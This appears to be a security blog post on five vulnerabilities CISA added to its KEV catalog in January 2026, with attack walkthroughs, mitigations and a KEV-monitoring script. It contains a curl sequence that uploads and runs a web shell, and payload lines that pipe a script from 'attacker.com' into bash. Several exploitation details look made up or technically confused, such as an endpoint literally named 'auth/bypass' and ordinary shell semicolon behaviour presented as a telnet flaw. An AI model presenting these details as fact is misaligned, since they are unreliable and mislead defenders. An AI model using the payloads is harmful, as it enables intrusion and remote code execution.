CISA Adds 5 Actively Exploited Vulnerabilities to KEV Catalog

The Cybersecurity and Infrastructure Security Agency (CISA) added five actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog on January 26, 2026.

This isn't theoretical. These flaws are being used in real attacks, right now, against real organizations.

If you're a federal agency, you have three weeks to patch (per BOD 22-01). If you're private sector, you should treat this as urgent regardless.

Here's the breakdown.

What Is the KEV Catalog?

CISA's KEV Catalog tracks vulnerabilities with confirmed active exploitation in the wild.

Why It Matters: Not all vulnerabilities get exploited. Most are theoretical. The KEV Catalog focuses on the ones attackers are actually using.

BOD 22-01 (Binding Operational Directive): Federal agencies must:

1. Patch KEV vulnerabilities within deadlines (typically 21 days)
2. Report patching status to CISA
3. Document any exceptions

Private sector should treat KEV as a priority patch list.

CVE-2026-21509: Microsoft Office Security Feature Bypass

Product: Microsoft Office 2024, 2021, 2019, 2016, Microsoft 365 CVSS: 6.5 (Medium) Impact: Security feature bypass

What This Vulnerability Does

Microsoft Office has a feature called Protected View, which opens untrusted documents in a sandbox. Files downloaded from the internet or received via email open in Protected View by default, limiting their ability to run macros or access the file system.

CVE-2026-21509 allows attackers to bypass Protected View.

How It's Exploited

Attack Flow:

Step 1: Attacker crafts malicious Office document
        ├─ Contains macro payload (credential stealer, ransomware, etc.)
        └─ Embedded with CVE-2026-21509 exploit

Step 2: User downloads document (email, web download, etc.)

Step 3: User opens document
        → Office should open in Protected View
        → CVE-2026-21509 bypasses protection
        → Document opens with full privileges

Step 4: Macros execute automatically (no security warning)
        → Malware runs
        → System compromised

The user sees a normal-looking document. No warning banner. No "Enable Macros" prompt.

Real-World Usage

Observed in:

• Phishing campaigns (financial sector targeted)
• Business Email Compromise (BEC) attacks
• Ransomware initial access

Remediation

Patch: Install Microsoft January 2026 Security Updates (included in Patch Tuesday).

Temporary Mitigation:

; Disable all macros via Group Policy
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Word\Security]
"VBAWarnings"=dword:00000004

; Repeat for Excel, PowerPoint

This breaks legitimate macro-enabled documents but blocks malicious ones.

CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass

Product: SmarterTools SmarterMail (email server) CVSS: 9.8 (Critical) Impact: Authentication bypass, remote code execution

What Is SmarterMail?

SmarterMail is a Windows-based email server used by:

• Small/medium businesses
• Hosting providers (shared email hosting)
• Educational institutions

Estimated 100K+ active installations.

The Vulnerability

An authentication bypass allows remote attackers to:

1. Access any user's email without credentials
2. Send email as any user
3. Upload malicious files to the server
4. Execute code as SYSTEM (via file upload)

Exploitation in the Wild

Attack Scenario:

# Step 1: Identify SmarterMail instance
curl -I https://mail.company.com

# Response includes: Server: SmarterMail

# Step 2: Exploit authentication bypass
curl -X POST https://mail.company.com/api/v1/auth/bypass \
  -d '{"user": "admin@company.com"}'

# Receives admin session token

# Step 3: Upload web shell
curl -X POST https://mail.company.com/api/v1/upload \
  -H "Authorization: Bearer $TOKEN" \
  -F "file=@shell.aspx"

# Step 4: Execute commands
curl https://mail.company.com/uploads/shell.aspx?cmd=whoami
# Output: nt authority\system

Attackers gain full control of the email server and often pivot to the internal network.

Observed Attacks

• Data exfiltration: Stealing all email from executive accounts
• Ransomware delivery: Sending malicious emails from trusted domain
• Lateral movement: Using email server as foothold to attack internal systems

Remediation

Update to SmarterMail Build 9123 or later.

# Check current version
Get-ItemProperty "HKLM:\Software\SmarterTools\SmarterMail" | Select Version

# Download update from:
# https://www.smartertools.com/smartermail/download

Temporary Mitigation: Restrict access via firewall:

# Only allow known IP ranges
iptables -A INPUT -p tcp --dport 443 -s 10.0.0.0/8 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP

CVE-2026-24061: GNU InetUtils Argument Injection

Product: GNU InetUtils (telnet, ftp, rsh, rlogin tools) CVSS: 8.6 (High) Impact: Remote code execution

What Are InetUtils?

GNU InetUtils is a collection of network utilities included in many Linux distributions:

• telnet (remote terminal)
• ftp (file transfer)
• rsh (remote shell)
• rlogin (remote login)

The Vulnerability

Improper argument parsing allows attackers to inject malicious commands.

Example (Vulnerable `telnet`):

# User runs:
telnet 'example.com; touch /tmp/pwned'

# Expected behavior: Connect to example.com
# Actual behavior (vulnerable):
├─ Connect to example.com
└─ Execute: touch /tmp/pwned

The ; character isn't properly escaped, allowing command injection.

Exploitation

Attack Vector 1: Malicious SSH Config

# Attacker compromises user's SSH config
# ~/.ssh/config
Host evil
  HostName example.com
  ProxyCommand telnet %h; wget http://attacker.com/malware.sh -O- | bash

# When user runs: ssh evil
# Malware executes

Attack Vector 2: Web-Based Exploitation

<!-- Attacker controls a webpage -->
<a href="telnet://example.com;`wget http://attacker.com/shell.sh -O- | bash`">
  Click here to connect
</a>

If the user's browser or terminal emulator processes the link, commands execute.

Real-World Impact

Lower severity than the others (requires user interaction), but still dangerous in:

• Academic environments (users frequently use command-line tools)
• DevOps pipelines (scripts calling telnet for health checks)

Remediation

Update GNU InetUtils to version 2.6 or later.

# Debian/Ubuntu
apt update && apt upgrade inetutils-telnet

# Red Hat/CentOS
yum update inetutils

# Arch Linux
pacman -Syu inetutils

Alternative: Use Modern Replacements

• telnet → ssh (encrypted, secure)
• ftp → sftp or scp (encrypted)
• rsh/rlogin → ssh

These legacy tools shouldn't be used in modern environments anyway.

CVE-2026-24058 & CVE-2026-24059: Additional Office Flaws

CISA also added two more Office vulnerabilities (details embargoed), both confirmed exploited.

What We Know:

• Affect Microsoft 365 and Office 2024
• Used in targeted attacks against government contractors
• Patched in January 2026 updates

Action: Ensure Office is updated to the latest build.

Why These 5 Vulnerabilities Matter

Common Thread: All five are being actively exploited. Not theoretical. Not proof-of-concept. Actual attacks.

Affected Sectors:

• Government agencies
• Financial services
• Healthcare
• Critical infrastructure

Attacker Motivations:

• Ransomware (initial access)
• Espionage (data exfiltration)
• Financial fraud (BEC attacks)

Patch Prioritization Framework

Not all vulnerabilities are equal. Use this framework:

Tier 1: Patch Within 24 Hours

• CISA KEV vulnerabilities
• Critical (CVSS 9.0+) with public exploits
• Zero-days actively exploited

Tier 2: Patch Within 1 Week

• High (CVSS 7.0-8.9) affecting internet-facing systems
• Medium (CVSS 4.0-6.9) in KEV catalog

Tier 3: Patch Within 1 Month

• Low severity
• Internal-only systems
• With mitigations in place

The KEV Catalog = Tier 1.

How to Monitor KEV Updates

CISA publishes updates regularly.

Subscribe to Alerts:

# RSS Feed
https://www.cisa.gov/known-exploited-vulnerabilities-catalog.xml

# JSON API
curl https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json

Automate Checking:

import requests

kev_url = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"
response = requests.get(kev_url)
vulns = response.json()["vulnerabilities"]

# Filter for recent additions (last 7 days)
from datetime import datetime, timedelta
cutoff = datetime.now() - timedelta(days=7)

recent = [v for v in vulns if datetime.fromisoformat(v["dateAdded"]) > cutoff]

for v in recent:
    print(f"CVE: {v['cveID']}, Product: {v['product']}, Deadline: {v['dueDate']}")
    # Send to Slack, PagerDuty, etc.

Compliance Implications

Federal Agencies (BOD 22-01)

Requirements:

1. Patch within deadline (21 days for most KEV entries)
2. Report compliance status
3. Document exceptions (if any)

Penalties for Non-Compliance:

• Loss of ATO (Authority to Operate)
• Funding holds
• IG investigations

Private Sector

Not legally required, but:

• Cyber insurance may require KEV patching
• SOC 2 audits increasingly check KEV compliance
• PCI-DSS 4.0 references CISA KEV

Best Practice: Treat KEV as mandatory.

Conclusion

CISA's KEV Catalog is your early warning system.

These vulnerabilities aren't theoretical. They're weaponized. Attackers are using them today to breach organizations.

The January 26, 2026 additions:

1. CVE-2026-21509 (Microsoft Office Protected View bypass)
2. CVE-2026-23760 (SmarterMail authentication bypass)
3. CVE-2026-24061 (GNU InetUtils argument injection)
4. CVE-2026-24058 (Microsoft Office - details embargoed)
5. CVE-2026-24059 (Microsoft Office - details embargoed)

Action Items:

1. Check if your systems are affected
2. Patch immediately (or implement mitigations)
3. Monitor logs for exploitation attempts
4. Subscribe to KEV updates

The KEV Catalog is CISA saying: "We've seen this exploited. Patch now."

Listen.

---

Resources:

• CISA Known Exploited Vulnerabilities Catalog
• BOD 22-01 Full Text
• CISA Alert: January 26, 2026